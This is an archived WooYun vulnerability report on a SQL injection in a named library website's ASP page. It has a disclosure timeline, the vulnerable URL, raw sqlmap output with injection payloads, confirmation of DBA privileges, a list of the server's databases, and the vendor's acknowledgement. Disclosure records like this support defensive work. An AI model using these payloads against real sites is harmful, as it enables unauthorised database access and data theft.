乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-25: 细节已通知厂商并且等待厂商处理中 2015-03-26: 厂商已经确认,细节仅向厂商公开 2015-04-05: 细节向核心白帽子及相关领域专家公开 2015-04-15: 细节向普通白帽子公开 2015-04-25: 细节向实习白帽子公开 2015-05-10: 细节向公众公开
SQL注入,DBA权限,可出数据
注入点:http://www.fslib.com.cn/oldfslib/FslibInfo/Tribe/view.asp?ID=289
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 59 HTTP(s) requests:---Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=289' AND 7155=7155 AND 'BuFQ'='BuFQ Type: UNION query Title: Generic UNION query (NULL) - 16 columns Payload: ID=-6977' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(87)+CHAR(87)+CHAR(103)+CHAR(109)+CHAR(110)+CHAR(109)+CHAR(70)+CHAR(81)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ID=289'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ID=289' WAITFOR DELAY '0:0:5'-----[21:43:05] [INFO] testing Microsoft SQL Server[21:43:06] [INFO] confirming Microsoft SQL Server[21:43:07] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2008[21:43:07] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 37 times[21:43:07] [INFO] fetched data logged to text files under 'C:\Users\DarkWing\.sqlmap\output\www.fslib.com.cn'[*] shutting down at 21:43:07
DBA权限
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=289' AND 7155=7155 AND 'BuFQ'='BuFQ Type: UNION query Title: Generic UNION query (NULL) - 16 columns Payload: ID=-6977' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(87)+CHAR(87)+CHAR(103)+CHAR(109)+CHAR(110)+CHAR(109)+CHAR(70)+CHAR(81)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ID=289'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ID=289' WAITFOR DELAY '0:0:5'-----[21:44:04] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2008[21:44:04] [INFO] testing if current user is DBAcurrent user is DBA: True[21:44:04] [INFO] fetched data logged to text files under 'C:\Users\DarkWing\.sqlmap\output\www.fslib.com.cn'[*] shutting down at 21:44:04
available databases [14]:[*] beehome[*] DBWIN_L4P_UCDRS[*] fselib[*] FSUnionlib[*] master[*] model[*] msdb[*] newlib[*] oldfslib[*] ReportServer[*] ReportServerTempDB[*] ResourcesClient[*] tempdb[*] wenhua
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-03-26 14:11
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无